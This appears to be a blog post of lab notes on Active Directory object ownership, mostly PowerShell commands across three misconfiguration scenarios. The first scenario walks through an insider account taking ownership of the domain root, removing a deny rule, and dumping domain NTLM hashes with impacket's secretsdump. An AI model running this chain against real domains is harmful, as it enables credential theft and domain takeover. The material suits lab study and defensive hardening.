Back to the Basics; Ownership Matters

  • Scenario I; an odd mashup of AD privileges
  • Scenario II; a junior sysadmin screws up an OU
  • Scenario III; a section FUBARs their own data’s ACL
  • A user has been placed in 2 groups; GroupX and GroupY
  • Group X has been denied ExtendedRight with ObjectType all 0s & WriteDACL on the domain root
  • Group Y has been allowed FullControl on the domain root
#Create a Malicious Insider account
New-ADUser -DisplayName “Malicious Insider” -SamAccountName “Insider” -UserPrincipalName “Insider@corp.local” -Path ‘ou=user accounts,dc=corp,dc=local’
#Create GroupX, Deny Extended all 0s, Deny WriteDACL
#Create GroupY, Allow GenericAll
#Add Insider to both groups
Import-Module ActiveDirectory
Set-Location AD:
New-ADGroup -GroupScope Global -GroupCategory Security -Name “GroupX” -Path ‘ou=user accounts,dc=corp,dc=local’ -DisplayName “GroupX” -SamAccountName “GroupX”New-ADGroup -GroupScope Global -GroupCategory Security -Name “GroupY” -Path ‘ou=user accounts,dc=corp,dc=local’ -DisplayName “GroupY” -SamAccountName “GroupY”$acl = Get-Acl “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “GroupX”).SID.Value
#Deny ExtendedRight with GUID all 0s (http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm)
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $user,”ExtendedRight”,”DENY”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid,”None”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid))
#Apply above ACL rules
Set-ACL “AD:\dc=corp,dc=local” $acl
$acl = Get-Acl “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “GroupX”).SID.Value
#Deny WriteDACL
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $user,”WriteDACL”,”DENY”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid,”None”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid))
#Apply above ACL rules
Set-ACL “AD:\dc=corp,dc=local” $acl
$acl = Get-ACL “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “GroupY”).SID
#Allow GenericAll
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $user,”GenericAll”,”ALLOW”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid,”None”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid))
#Apply above ACL rules
Set-ACL “AD:\dc=corp,dc=local” $acl
Add-ADGroupMember -Identity “GroupX” -Members Insider
Add-ADGroupMember -Identity “GroupY” -Members Insider
(Get-Acl (Get-ADDomain).DistinguishedName).access | Where {($_.IdentityReference -like “*GroupX*”) -or ($_.IdentityReference -like “*GroupY*”)}Get-ADGroup -Identity (((Get-Acl ((Get-ADDomain).DistinguishedName)).Owner).split(“\”)[1]) | Select-Object SID, Name, DistinguishedName
Import-Module ActiveDirectory
Set-Location AD:
$acl = Get-Acl “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser -Identity “Insider”).SID
$acl.SetOwner($user)
Set-ACL “AD:\dc=corp,dc=local” $acl
$acl = Get-ACL “AD:\dc=corp,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADGroup -Identity “GroupX”).SID
#Remove Deny ExtendedRight with GUID all 0s to Allow (http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm)
$acl.RemoveAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $user,”ExtendedRight”,”DENY”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid,”None”,([GUID](“00000000–0000–0000–0000–000000000000”)).guid))
#Apply above ACL rules
Set-ACL “AD:\dc=corp,dc=local” $acl
cd /home/kali/Downloads/impacket-master/examplespython3 secretsdump.py -just-dc-ntlm corp/insider@192.168.0.110
#Don’t bother setting firstname/lastname/pwd or enabling them. They’re just placeholders for a lab.Import-Module ActiveDirectory
New-ADOrganizationalUnit -Name “VIPs” -Path “dc=test,dc=local”
New-ADUser -DisplayName “CEO” -Name “CEO” -SamAccountName “CEO” -UserPrincipalName “CEO@test.local” -Path ‘ou=VIPs,dc=test,dc=local’
New-ADUser -DisplayName “CIO” -Name “CIO” -SamAccountName “CIO” -UserPrincipalName “CIO@test.local” -Path ‘ou=VIPs,dc=test,dc=local’
New-ADUser -DisplayName “CISO” -Name “CISO” -SamAccountName “CISO” -UserPrincipalName “CISO@test.local” -Path ‘ou=VIPs,dc=test,dc=local’
New-ADUser -DisplayName “SomeOverPaidVIP” -Name “SomeOverPaidVIP” -SamAccountName “SomeOverPaidVIP” -UserPrincipalName “SomeOverPaidVIP@test.local” -Path ‘ou=VIPs,dc=test,dc=local’
Set-Location AD:
$acl = Get-Acl “AD:\ou=VIPs,dc=test,dc=local”
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser -Identity “mishka”).SID
$acl.SetOwner($user)
Set-ACL “AD:\ou=VIPs,dc=test,dc=local” $acl
$KnownGood = Get-Acl -Path “AD:\ou=user accounts,dc=test,dc=local”
Set-Acl -Path “AD:\ou=VIPs,dc=test,dc=local” -AclObject $KnownGood
New-Item -ItemType Directory -Path C:\Temp\Share
Add-Content “C:\Temp\Share\SuperSecretSquirrelStuff.txt” -Value “Be careful with this stuff!”
New-SmbShare -Name “Share” -Path “C:\Temp\Share” -FullAccess “test\Minions” -ReadAccess “Everyone”
Grant-SmbShareAccess -Name “Share” -AccountName “test\Domain Admins” -AccessRight Full -Force
Set-SmbPathAcl -ShareName “Share”
Get-SmbShareAccess -Name “Share”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rich

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.